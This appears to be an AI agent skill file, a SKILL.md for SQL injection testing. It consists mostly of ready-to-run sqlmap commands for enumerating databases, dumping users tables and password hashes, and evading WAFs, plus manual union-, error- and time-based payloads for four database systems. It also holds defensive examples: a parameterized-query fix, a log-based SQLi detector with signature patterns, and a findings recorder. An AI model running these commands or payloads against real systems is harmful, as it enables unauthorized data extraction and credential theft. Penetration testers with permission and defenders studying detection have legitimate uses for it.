exploit-sqli (SKILL.md)

SQL Injection Detection & Exploitation

Authorization Warning

DANGER: SQL injection testing can damage or destroy data in production databases. Always ensure you have:

  • Written permission from the target application owner
  • Isolated testing environment
  • Backups of affected systems
  • Legal compliance with local regulations

Never test SQL injection on production databases without authorization.

Prerequisites

Required tools that must be installed on your system:

  • sqlmap - pip install sqlmap or git clone https://github.com/sqlmapproject/sqlmap

Optional tools:

  • BBQSQL - Semi-automated SQL injection tool
  • NoSQLMap - NoSQL injection testing

Quick Start

Most commonly used commands for SQL injection testing:

Automated SQLMap Scan

sqlmap -u "https://target.com/page?id=1"

POST Request Testing

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

Cookie Testing

sqlmap -u "https://target.com" --cookie="sessionid=abc123"

Common Scenarios

Scenario 1: Basic Parameter Testing

When you need to test a URL parameter for SQL injection:

sqlmap -u "https://target.com/page?id=1"

Parameters:

  • -u - Target URL
  • -p - Specific parameter to test (default: all)
  • --batch - Avoid interactive prompts
  • --random-agent - Use random User-Agent

Example:

sqlmap -u "https://target.com/vuln.php?id=1" --batch --random-agent

Scenario 2: POST Request Injection

When you need to test POST body parameters:

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

From a saved HTTP request file (the full request, including its POST body, is loaded with -r; -d is sqlmap's direct database connection option, not a POST data file):

sqlmap -r request.txt

Scenario 3: Cookie/Header Injection

When you need to test cookies or headers:

# Cookie injection
sqlmap -u "https://target.com" --cookie="sessionid=abc123"

# User-Agent injection
sqlmap -u "https://target.com" --headers="User-Agent: sqlmap"

# Referer injection
sqlmap -u "https://target.com" --referer="https://evil.com"

Multiple headers:

sqlmap -u "https://target.com" -H "Cookie:id=1" -H "User-Agent: test"

Scenario 4: Specific DBMS Testing

When you know or suspect the database type:

sqlmap -u "https://target.com/page?id=1" --dbms=mysql
sqlmap -u "https://target.com/page?id=1" --dbms=postgresql
sqlmap -u "https://target.com/page?id=1" --dbms=sqlserver
sqlmap -u "https://target.com/page?id=1" --dbms=oracle

Scenario 5: Database Enumeration

When you need to extract database information:

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs

# List tables
sqlmap -u "https://target.com/page?id=1" -D dbname --tables

# Dump table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users --dump

# Dump all
sqlmap -u "https://target.com/page?id=1" --dump-all

Scenario 6: User Enumeration

When you need to extract user credentials:

# Enumerate database users
sqlmap -u "https://target.com/page?id=1" --users

# Extract password hashes
sqlmap -u "https://target.com/page?id=1" --passwords

# Dump users table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users -C username,password --dump

Scenario 7: Union-Based SQL Injection

Manual testing for Union-based SQLi:

# Test for SQL injection with payload
https://target.com/page?id=1' OR '1'='1
https://target.com/page?id=1' UNION SELECT 1,2,3--
https://target.com/page?id=1' UNION SELECT NULL,version(),NULL--

Determine column count:

id=1' ORDER BY 1--
id=1' ORDER BY 2--
id=1' ORDER BY 3--

Check for string vs integer:

id=1' UNION SELECT 1,'2',3--
id=1' UNION SELECT 1,NULL,NULL--
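The probes above work only because the application splices the `id` value into the SQL text. The following is an added example (not code from this skill or from sqlmap) that puts the defect beside its fix on a constructed in-memory SQLite table: the concatenated query leaks every row to the `' OR '1'='1` tautology and leaks the column count through ORDER BY / UNION errors, while the parameterized query treats the same strings as plain data. Table contents, function names and the `probe` helper are assumptions made for the demo.

```python
import sqlite3

# Constructed rows for the demo; not data from any real application.
SEED_ROWS = [
    (1, "alice", "hash-a1b2c3"),
    (2, "bob", "hash-d4e5f6"),
    (3, "carol", "hash-g7h8i9"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """The defect: the request value is spliced into the SQL text, so quotes,
    OR, UNION and ORDER BY inside it are parsed as part of the statement."""
    sql = "SELECT id, username FROM users WHERE id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """The fix: the value is bound as a parameter and never parsed as SQL.
    A payload string is simply compared, as data, against the id column."""
    sql = "SELECT id, username FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(conn: sqlite3.Connection, payload: str) -> tuple:
    """Run one payload through the vulnerable query and report what the
    application would observe: a row count, or the database error text.
    This observable difference is what the column-count probes depend on,
    which is why raw database errors must never reach the client."""
    try:
        rows = find_user_vulnerable(conn, payload)
        return ("rows", len(rows))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    tautology = "1' OR '1'='1"
    print("vulnerable:", find_user_vulnerable(db, tautology))  # every row leaks
    print("safe:      ", find_user_safe(db, tautology))        # no match: []
    for p in ("1' ORDER BY 2--", "1' ORDER BY 3--", "1' UNION SELECT 1,2--"):
        print(p, "->", probe(db, p))
```

Binding the parameter is the whole fix; SQLite still converts a bound `"1"` to the integer 1 for the comparison, so legitimate lookups keep working while the tautology string no longer matches anything. Rejecting non-numeric ids before the query is worthwhile defence in depth but is not what stops the injection.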

Scenario 8: Error-Based SQL Injection

When error messages are displayed:

# MySQL error injection
id=1' AND extractvalue(1, concat(0x7e, database(), 0x7e))--
id=1' AND updatexml(1, concat(0x7e, database(), 0x7e), 1)--
id=1' AND exp(~(SELECT * FROM (SELECT database())a))--

# PostgreSQL error injection
id=1' AND cast(version() as int)--
id=1'; CAST(version() AS INT)--

Scenario 9: Blind SQL Injection

When no error messages are returned:

Boolean-based:

id=1' AND 1=1--
id=1' AND 1=2--

Time-based (MySQL):

id=1' AND SLEEP(5)--
id=1' AND BENCHMARK(5000000, MD5(1))--

Time-based (PostgreSQL):

id=1'; SELECT pg_sleep(5)--
id=1'; SELECT extract(epoch from now())--

Scenario 10: WAF Evasion

When WAF blocks injection attempts:

# Use tamper scripts
sqlmap -u "https://target.com/page?id=1" --tamper=space2comment

# Use random agent
sqlmap -u "https://target.com/page?id=1" --random-agent

# Adjust test level and risk
sqlmap -u "https://target.com/page?id=1" --level=1 --risk=1

# Specific technique
sqlmap -u "https://target.com/page?id=1" --technique=U

Injection Testing Workflow

1. Initial Detection

# Automated scan
sqlmap -u "https://target.com/page?id=1" --batch

# Manual quick test
curl "https://target.com/page?id=1'" | grep -i "sql\|mysql\|syntax"
curl "https://target.com/page?id=1\" OR \"1\"=\"2" | grep -i "error"

2. Confirmation

# Confirm with multiple payloads
curl "https://target.com/page?id=1 AND 1=1"
curl "https://target.com/page?id=1 AND 1=2"
curl "https://target.com/page?id=1' OR '1'='1"

3. Fingerprint Database

sqlmap -u "https://target.com/page?id=1" --current-user

4. Enumeration

# Get database info
sqlmap -u "https://target.com/page?id=1" --hostname --current-db --is-dba

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs
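The workflow above is what the tester sees; the same steps leave a recognisable trail in the web server's access log. The following is an added example (not code from this skill) that runs simple detection logic over constructed log lines in combined format with an nginx-style request time appended: it URL-decodes each query string, matches the probe families used on this page (ORDER BY column counting, UNION SELECT, tautologies, SLEEP/BENCHMARK/pg_sleep, extractvalue/updatexml, trailing comment terminators), correlates a delay payload with a request that really stalled, correlates probes with 5xx responses, and notes sqlmap's default User-Agent, which disappears once `--random-agent` is used. The log lines, the 4-second delay threshold and the verdict thresholds are assumptions chosen for the demo.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined format + $request_time); not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Mar/2026:10:00:01 +0000] "GET /page?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0" 0.012
203.0.113.9 - - [30/Mar/2026:10:00:02 +0000] "GET /page?id=1%27%20ORDER%20BY%201-- HTTP/1.1" 200 512 "-" "sqlmap/1.x (https://sqlmap.org)" 0.015
203.0.113.9 - - [30/Mar/2026:10:00:02 +0000] "GET /page?id=1%27%20ORDER%20BY%203-- HTTP/1.1" 500 120 "-" "sqlmap/1.x (https://sqlmap.org)" 0.011
203.0.113.9 - - [30/Mar/2026:10:00:03 +0000] "GET /page?id=1%27%20UNION%20SELECT%20NULL,version(),NULL-- HTTP/1.1" 200 530 "-" "sqlmap/1.x (https://sqlmap.org)" 0.014
203.0.113.9 - - [30/Mar/2026:10:00:04 +0000] "GET /page?id=1%27%20AND%20SLEEP(5)-- HTTP/1.1" 200 512 "-" "sqlmap/1.x (https://sqlmap.org)" 5.021
198.51.100.4 - - [30/Mar/2026:10:01:10 +0000] "GET /page?id=1%27%20OR%20%271%27=%271 HTTP/1.1" 200 1490 "-" "Mozilla/5.0" 0.020
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<rt>[\d.]+)$'
)

# Signature families matched against the decoded, lower-cased query string.
SIGNATURES = {
    "union_select": re.compile(r"union\s+(all\s+)?select"),
    "tautology": re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+"),
    "column_probe": re.compile(r"order\s+by\s+\d+"),
    "time_delay": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\("),
    "error_based": re.compile(r"\b(extractvalue|updatexml)\s*\("),
    "comment_terminator": re.compile(r"(--|#|/\*)\s*$"),
}
DELAY_SECONDS = 4.0  # assumed threshold: a delay payload plus a stall this long is a hit


def classify_request(path: str, ua: str, status: int, rt: float) -> list:
    """Return the signature names that fire for one request."""
    query = unquote_plus(urlsplit(path).query).lower()
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if hits and status >= 500:
        hits.append("server_error")    # a probe produced a 5xx: likely an unhandled DB error
    if "time_delay" in hits and rt >= DELAY_SECONDS:
        hits.append("delay_observed")  # the server really stalled: blind time-based signal
    if ua.lower().startswith("sqlmap"):
        hits.append("sqlmap_ua")       # sqlmap's default User-Agent; absent with --random-agent
    return hits


def verdict(entry: dict) -> str:
    """Assumed scoring: strong indicators or a probe burst rate 'high'."""
    hits = entry["hits"]
    if "delay_observed" in hits or "sqlmap_ua" in hits or entry["probes"] >= 3:
        return "high"
    return "medium" if entry["probes"] >= 1 else "low"


def analyze(lines) -> dict:
    """Aggregate signature hits per source IP; IPs with no hits are omitted."""
    report = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines in another format rather than abort the run
        hits = classify_request(m["path"], m["ua"], int(m["status"]), float(m["rt"]))
        if not hits:
            continue
        entry = report.setdefault(m["ip"], {"probes": 0, "hits": {}})
        if any(h != "sqlmap_ua" for h in hits):
            entry["probes"] += 1  # one request carrying at least one payload signature
        for h in hits:
            entry["hits"][h] = entry["hits"].get(h, 0) + 1
    for entry in report.values():
        entry["verdict"] = verdict(entry)
    return report


if __name__ == "__main__":
    for ip, entry in analyze(SAMPLE_LOG.splitlines()).items():
        print(ip, entry["verdict"], entry["probes"], "probes", entry["hits"])
```

The per-request signatures are deliberately coarse; what makes the report useful is the aggregation: a single tautology from a browser-like agent is worth a look, while a run of column-count probes followed by a request that stalled for five seconds is the time-based confirmation step from Scenario 9 seen from the server side.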

SQLMap Options Reference

Option           Description
-u               Target URL
-r               Load HTTP request from a file
-l               Parse target(s) from a Burp/WebScarab proxy log file
-m               Scan multiple targets listed in a file
-p               Test specific parameter(s)
--skip           Skip parameter(s)
--dbms           Force back-end DBMS
--os             Force back-end OS
--tamper         Tamper script(s)
--level          Test level (1-5)
--risk           Risk level (1-3)
--technique      Injection technique(s) to use (B/E/U/S/T)
--batch          Non-interactive (accept default answers)
--random-agent   Random User-Agent
--proxy          Use a proxy
--delay          Delay between requests (seconds)
--timeout        Request timeout (seconds)
--retries        Retry attempts
--string         String to match when the query is True
--not-string     String to match when the query is False
--regexp         Regexp to match when the query is True
--grep           Regexp filter for pages
--crawl          Crawl the site
--forms          Parse and test forms
--cookie         Cookie value
--headers        Extra headers
--user-agent     Custom User-Agent
--method         Force HTTP method
--data           POST data
-d               Direct database connection string
--dbs            Enumerate databases
--tables         Enumerate tables
--columns        Enumerate columns
--schema         Enumerate schema
--dump           Dump table entries
--dump-all       Dump all databases' tables
--search         Search column(s), table(s) and/or database name(s)
--users          Enumerate DB users
--passwords      Enumerate password hashes
--priv-esc       Database process user privilege escalation
--os-shell       OS shell
--os-pwn         Meterpreter/OOB shell
--sql-shell      SQL shell
--wizard         Wizard mode
-v               Verbosity (0-6)

Manual Payloads

MySQL Payloads

-- Version detection
' UNION SELECT @@version--

-- Current user
' UNION SELECT user()--

-- Current database
' UNION SELECT database()--

-- All databases
' UNION SELECT schema_name FROM information_schema.schemata--

-- Tables from database
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--

-- Columns from table
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Concatenate data
' UNION SELECT CONCAT(username,0x3a,password) FROM users--

PostgreSQL Payloads

-- Version
' UNION SELECT version()--

-- Current user
' UNION SELECT user--

-- Current database
' UNION SELECT current_database()--

-- All databases
' UNION SELECT datname FROM pg_database--

-- Tables
' UNION SELECT tablename FROM pg_tables WHERE schemaname='public'--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

SQL Server Payloads

-- Version
' UNION SELECT @@version--

-- Database
' UNION SELECT DB_NAME()--

-- Tables
' UNION SELECT table_name FROM information_schema.tables--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Databases
' UNION SELECT name FROM master..sysdatabases--

Oracle Payloads

-- Version
' UNION SELECT banner FROM v$version--

-- Tables
' UNION SELECT table_name FROM all_tables WHERE owner=USER--

-- Columns
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--

Testing Checklist

  • URL parameters
  • POST parameters
  • Cookies
  • User-Agent
  • Referer
  • X-Forwarded-For
  • Accept headers
  • JSON body fields
  • GraphQL queries
  • API endpoints

Scenario: Persistent Storage of SQL Injection Findings

When you need to persist SQL injection findings to the database:

# Manual entry after discovering SQL injection
python .claude/skills/exploit-sqli/scripts/sqli_storage.py \
  --host-ip 192.168.1.100 \
  --url "https://example.com/login?id=1" \
  --parameter id \
  --payload "1' OR '1'='1" \
  --severity Critical \
  --cvss-score 9.8 \
  --db-type MySQL \
  --subsystem "Web Application"

Parameters:

  • --host-ip - Target host IP (required)
  • --url - Vulnerable URL (required)
  • --parameter - Vulnerable parameter name (required)
  • --payload - Payload used (required)
  • --severity - Severity level (default: High)
  • --cvss-score - CVSS score (0.0-10.0)
  • --db-type - Database type (e.g., MySQL, PostgreSQL)
  • --subsystem - Subsystem name (optional)
  • --title - Vulnerability title (auto-generated if not specified)
  • --description - Vulnerability description

Database location: ./data/results.db

Related skills: results-storage - Query data, generate reports
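The storage step above records the very strings that broke the target, so the recording tool itself must not be injectable. The following is an added example (not the skill's own sqli_storage.py, whose code is not shown here) of a findings store with the same command-line flags: it creates the table on first use, validates severity and the CVSS range, auto-generates the title when none is given, and inserts and filters with bound parameters so a payload such as `1' OR '1'='1` is stored verbatim. The schema, column names, severity set and the extra `--db` flag are assumptions made for the demo.

```python
import argparse
import sqlite3
from pathlib import Path

SEVERITIES = ("Low", "Medium", "High", "Critical")  # assumed set for the demo

SCHEMA = """
CREATE TABLE IF NOT EXISTS sqli_findings (
    id          INTEGER PRIMARY KEY AUTOINCREMENT,
    host_ip     TEXT NOT NULL,
    url         TEXT NOT NULL,
    parameter   TEXT NOT NULL,
    payload     TEXT NOT NULL,
    severity    TEXT NOT NULL,
    cvss_score  REAL,
    db_type     TEXT,
    subsystem   TEXT,
    title       TEXT NOT NULL,
    description TEXT,
    created_at  TEXT NOT NULL DEFAULT (datetime('now'))
)
"""


def open_db(path: str = "./data/results.db") -> sqlite3.Connection:
    """Open the findings database, creating directory and table if needed."""
    if path != ":memory:":
        Path(path).parent.mkdir(parents=True, exist_ok=True)
    conn = sqlite3.connect(path)
    conn.execute(SCHEMA)
    return conn


def store_finding(conn, host_ip, url, parameter, payload, severity="High",
                  cvss_score=None, db_type=None, subsystem=None,
                  title=None, description=None) -> int:
    """Validate one finding, insert it with bound parameters, return its row id.
    The payload column holds hostile SQL fragments by design; never build this
    INSERT by string formatting."""
    if severity not in SEVERITIES:
        raise ValueError(f"severity must be one of {SEVERITIES}")
    if cvss_score is not None and not 0.0 <= float(cvss_score) <= 10.0:
        raise ValueError("cvss_score must be between 0.0 and 10.0")
    if not title:
        title = f"SQL Injection in parameter '{parameter}' at {url}"
    cur = conn.execute(
        "INSERT INTO sqli_findings (host_ip, url, parameter, payload, severity, "
        "cvss_score, db_type, subsystem, title, description) "
        "VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
        (host_ip, url, parameter, payload, severity, cvss_score, db_type,
         subsystem, title, description),
    )
    conn.commit()
    return cur.lastrowid


def list_findings(conn, host_ip=None) -> list:
    """Return findings as dicts, optionally filtered by host (filter is bound too)."""
    conn.row_factory = sqlite3.Row
    if host_ip is None:
        rows = conn.execute("SELECT * FROM sqli_findings ORDER BY id").fetchall()
    else:
        rows = conn.execute(
            "SELECT * FROM sqli_findings WHERE host_ip = ? ORDER BY id", (host_ip,)
        ).fetchall()
    return [dict(r) for r in rows]


def main(argv=None) -> int:
    """CLI mirroring the flags documented above; returns the new row id."""
    ap = argparse.ArgumentParser(description="Record a SQL injection finding")
    ap.add_argument("--host-ip", required=True)
    ap.add_argument("--url", required=True)
    ap.add_argument("--parameter", required=True)
    ap.add_argument("--payload", required=True)
    ap.add_argument("--severity", default="High", choices=SEVERITIES)
    ap.add_argument("--cvss-score", type=float)
    ap.add_argument("--db-type")
    ap.add_argument("--subsystem")
    ap.add_argument("--title")
    ap.add_argument("--description")
    ap.add_argument("--db", default="./data/results.db")  # assumed extra flag
    a = ap.parse_args(argv)
    conn = open_db(a.db)
    rowid = store_finding(conn, a.host_ip, a.url, a.parameter, a.payload, a.severity,
                          a.cvss_score, a.db_type, a.subsystem, a.title, a.description)
    print(f"stored finding #{rowid}")
    return rowid


if __name__ == "__main__":
    main()
```

Running it with the flags from the scenario above (plus `--db` to pick a path) writes one row; `list_findings` is what a reporting skill would call to pull the rows back, and its host filter is bound for the same reason the insert is.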


Resources

Scripts

  • scripts/sqli_payload_generator.py - Generate SQL injection payloads
  • scripts/boolean_sqli_tester.py - Test blind SQL injection
  • scripts/response_analyzer.py - Analyze responses for injection clues

References

  • references/sqlmap_guide.md - Comprehensive SQLMap reference
  • references/manual_sqli_techniques.md - Manual injection techniques
  • references/nosql_injection.md - NoSQL injection guide

Assets

  • assets/common_error_payloads.txt - Common error-based payloads
  • assets/time-based_payloads.txt - Time-based blind payloads
  • assets/dbms_fingerprints.txt - Database fingerprinting patterns
Source: crazymarky/pentest-skills (Installs: 9, GitHub Stars: 110, First Seen: Mar 30, 2026)